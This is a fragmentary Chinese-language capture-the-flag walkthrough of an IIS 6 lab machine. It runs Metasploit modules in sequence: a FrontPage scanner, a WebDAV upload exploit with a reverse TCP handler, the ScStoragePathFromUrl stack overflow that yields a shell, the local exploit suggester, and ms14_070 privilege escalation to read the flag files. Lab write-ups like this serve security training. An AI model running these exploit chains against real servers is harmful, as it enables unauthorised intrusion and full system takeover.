OSVDB-3233: /postinfo.html: Microsoft FrontPage default file found.
搜索一下Microsoft FrontPage
auxiliary/scanner/http/frontpage_login
结果
1 2 3
[*]10.10.10.14:80-http://10.10.10.14/ may not support FrontPage Server Extensions [*]Scanned1of1hosts (100% complete) [*]Auxiliarymoduleexecutioncompleted
什么是WebDAV?
WebDAV 是 HTTP/1.1 协议的扩展,它允许客户机执行远程 Web 内容制作操作。WebDAV 是对 HTTP/1.1 协议的扩展,添加了新的 HTTP 方法和标头,支持任意类型的 Web 制作,不仅支持 HTML 和 XML,还支持文本、图形、电子表格等格式。 Webdav安全配置相关与漏洞利用
trying3: webdav put上传
1 2 3 4 5 6 7
exploit/windows/iis/iis_webdav_upload_asp
[*] Started reverse TCP handler on 10.10.14.13:4444 [*] Checking /metasploit250598085.asp [*] Uploading 611136 bytes to /metasploit250598085.txt... [-] Upload failed on /metasploit250598085.txt[500 Internal Server Error] [*] Exploit completed, but no session was created.
获得一个shell
远程栈溢出
当时python的exp执行失败,就以为该漏洞不存在==
1 2 3 4 5 6
use exploit/windows/iis/iis_webdav_scstoragepathfromurl set RHOST 10.10.10.14 run getuid pwd sysinfo
提权
1 2 3 4 5 6 7 8 9 10 11
search suggester
[*] 10.10.10.14 - Collecting local exploits for x86/windows... [*] 10.10.10.14 - 28 exploit checks are being tried... [+] 10.10.10.14 - exploit/windows/local/ms10_015_kitrap0d: The target service isrunning, but could not be validated. [+] 10.10.10.14 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable. [+] 10.10.10.14 - exploit/windows/local/ms14_070_tcpip_ioctl: The target appears to be vulnerable. [+] 10.10.10.14 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable. [+] 10.10.10.14 - exploit/windows/local/ms16_016_webdav: The target service isrunning, but could not be validated. [+] 10.10.10.14 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The target service isrunning, but could not be validated. [+] 10.10.10.14 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
尝试后,成功提权
1 2 3 4 5 6 7 8 9
use exploit/windows/local/ms14_070_tcpip_ioctl set SESSION 3 setLHOST tun0 run ps 查看进程 cd C:\Documents and Settings\Harry\Desktop cat user.txt cd C:\Documents and Settings\Administrator\Desktop cat root.txt